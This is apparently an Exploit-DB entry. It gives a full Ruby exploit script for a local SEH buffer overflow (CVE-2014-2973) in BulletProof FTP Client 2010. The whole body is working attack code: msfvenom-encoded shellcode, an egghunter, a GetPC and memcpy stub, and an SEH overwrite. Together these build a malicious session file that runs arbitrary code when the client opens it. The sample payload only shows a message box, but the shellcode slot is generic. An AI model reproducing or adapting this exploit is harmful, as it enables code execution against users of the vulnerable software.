BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)

EDB-ID:

35449




Platform:

Windows

Date:

2014-12-03


#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass stack size limitation for bigger payload. Allocate 2nd
# shellcode in heap and copy back to stack. This exploit use egghunter
# to locate 2nd shellcode in heap and copy to stack using memcpy function.

# Offset
seh = 93
filename = "xsession.bps"
buff = "A" * 400

# ./msfvenom -p windows/messagebox TEXT="Hello Exploit-DB" EXITFUNC=process -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_nai -f ruby
heap_sc =
"w00tw00t" +
"\xba\xaa\x8c\x8e\xda\xdb\xd3\xd9\x74\x24\xf4\x5f\x2b\xc9" +
"\xb1\x44\x31\x57\x14\x83\xef\xfc\x03\x57\x10\x48\x79\x57" +
"\x31\x17\x5b\x1c\xe2\xd3\x6d\x0f\x58\x6c\xbf\x66\xf9\x19" +
"\xce\x48\x89\x6b\x3d\x22\xfb\x8f\xb6\x72\x0c\x24\xb6\x5a" +
"\x87\x0c\x7f\xd4\x8f\x05\x8c\xb3\xae\x34\x8d\xa5\xd1\x3d" +
"\x1e\x02\x36\xca\x9a\x76\xbd\x98\x0c\xff\xc0\xca\xc6\xb5" +
"\xda\x81\x83\x69\xda\x7e\xd0\x5e\x95\x0b\x23\x14\x24\xe5" +
"\x7d\xd5\x16\x39\x81\x85\xdd\x79\x0e\xd1\x1c\xb6\xe2\xdc" +
"\x59\xa3\x09\xe5\x19\x17\xda\x6f\x03\xdc\x40\xb4\xc2\x09" +
"\x12\x3f\xc8\x86\x50\x65\xcd\x19\x8c\x11\xe9\x92\x53\xce" +
"\x7b\xe0\x77\x12\x1d\x2b\xc5\x22\xf4\x7f\xa3\xd6\x8f\xbd" +
"\xdc\x96\xde\x4f\xf1\xf5\x36\xd0\xf6\x05\x39\x67\x4d\xfe" +
"\x7d\x09\x96\x1c\xf2\x72\x3a\xc5\xa7\x94\xcd\xfa\xb7\x9b" +
"\x5b\x41\x40\x0b\x30\x26\x70\x8a\xa0\x85\x42\x22\x55\x82" +
"\xd7\x49\xf0\x20\x90\xf1\xde\xce\x29\xef\x49\x30\x7c\xeb" +
"\xfc\x0c\x2f\x48\x56\x32\x9d\x12\x20\x2f\x3a\x38\xc7\x31" +
"\xbd\x43\xe8\xda\x2e\xc3\x4f\x3b\xd9\x52\x17\x5e\x5b\xfc" +
"\x9a\xc5\x28\x8f\x15\xdd\x47\x33\x72\xeb\xde\x28\x12\xb3" +
"\xc0\x8e\xc3\x2b\x75\xe3\x47\xee\x1d\x8b\x2b\x81\xb4\x03" +
"\xdb\x7d\x02\xab\x4b\x36\xe9\x27\xe0\xf7\x38\x3f\xb4\xd3" +
"\xaa\xb6\xa4\x2d\x19\x9a\x75\x1f\xcf\xe5\xaa\xae\x2f\x49" +
"\xb4\x84\xa7"

# badchar '\x00\x0a\x0d\x1a\xb1\x83\xb2'
# only locate 1st heap address :P
heap_addr =
"\x50" + # push eax
"\xbb\xaf\x77\x77\x77" + # mov ebx,777777afh
"\x81\xeb\x7f\x77\x77\x77" + # sub ebx,7777777fh
"\x64\x8b\x1b" + # mov ebx,dword ptr fs:[ebx]
"\xb9\x0f\x78\x77\x77" + # mov ebx,7777780Fh
"\x81\xe9\x7f\x77\x77\x77" + # sub ecx,7777777fh
"\x8b\x1c\x0b" + # mov ebx,dword ptr [ebx+ecx]
"\x8b\x1b" #  mov ebx,dword ptr [ebx]

egghunter =
"\x8b\xd3\xeb\x05" + # mov edx,ebx # jmp $+7h
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e" +
"\x3c\x05\x5a\x74\xef\xb8" +
"\x77\x30\x30\x74" + # our tag 'w00t'
"\x8b\xfa\xaf\x75\xea\xaf" +
"\x75\xe7"

memcpy_func =
"\x58" + # pop eax # esp
"\x81\xc4\x54\xf2\xff\xff" + # add esp,-3500
"\xb9\xef\xe6\x3b\xef" + # mov ecx,0xef3be6ef
"\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f
"\x89\x08" + # mov [eax],ecx # memcpy() static address
"\x89\xc1" + # mov ecx,eax
"\x83\xc1\x10" + # add ecx,10h
"\x89\x48\x04" + # mov [eax+4h],ecx # void *dest
"\x89\x48\x08" + # mov [eax+8h],ecx # void *dest
"\x89\x78\x0c" + # mov [eax+0ch],edi # const wchar_t *src (shellcode)
"\xb9\x8d\x79\x77\x77" + # mov ecx,0x7777798d
"\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f
"\x89\x48\x10" + # mov [eax+10h],ecx # size_t count
"\x94\xc3" # xchg eax,esp # retn

stack_sc = heap_addr + egghunter + memcpy_func

# GetPC
buff[1,2] = "\xd9\xeb"                      # fldpi
buff[3,5] = "\x9b\xd9\x74\x24\xf4"          # fstenv [esp-0xc]
buff[8,1] = "\x58" # pop eax                # pop esp into eax

# FixRet stub 
buff[9,7] = "\xc7\x40\x44\x45\x45\x45\x45"  # (1)
buff[16,7] = "\xc7\x40\x58\x45\x45\x45\x45" # (2) place holder for jmp
buff[23,7] = "\xc7\x40\x5c\x45\x45\x45\x45" # (3) place holder for ppr

buff[30,stack_sc.size] = stack_sc

# restore 1st shellcode
buff[12,4] = buff[seh-24,4]                 # replace with original sc (1)
buff[19,4] = buff[seh-4,4]                  # replace with original sc (2)
buff[26,4] = buff[seh,4]                    # replace with original sc (3)

buff[seh-4,4] = "\xeb\xa6\x41\x41" # jmp $-166
buff[seh,4] = [0x72d11f39].pack('V').force_encoding("utf-8") # ppr : msacm32.drv only non-safeseh without null

bps =
"\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75" +
"\x6C\x6C\x65\x74\x50\x72\x6F\x6F\x66\x20\x46\x54" +
"\x50\x20\x43\x6C\x69\x65\x6E\x74\x20\x53\x65\x73" +
"\x73\x69\x6F\x6E\x2D\x46\x69\x6C\x65\x20\x61\x6E" +
"\x64\x20\x73\x68\x6F\x75\x6C\x64\x20\x6E\x6F\x74" +
"\x20\x62\x65\x20\x6D\x6F\x64\x69\x66\x69\x65\x64" +
"\x20\x64\x69\x72\x65\x63\x74\x6C\x79\x2E\x0D\x0A" +
buff + "\x0D\x0A\x61\x6E" +
"\x6F\x6E\x79\x6D\x6F\x75\x73\x0D\x0A" + heap_sc + "\x62\x70\x69" +
"\x63\x70\x6C\x6E\x6B\x69\x69\x62\x6D\x66\x65\x0D" +
"\x0A"

File.open(filename,"wb") do |fp|
  fp.write(bps)
  puts "Exploit file: #{filename} size: #{bps.size}"
  fp.close
end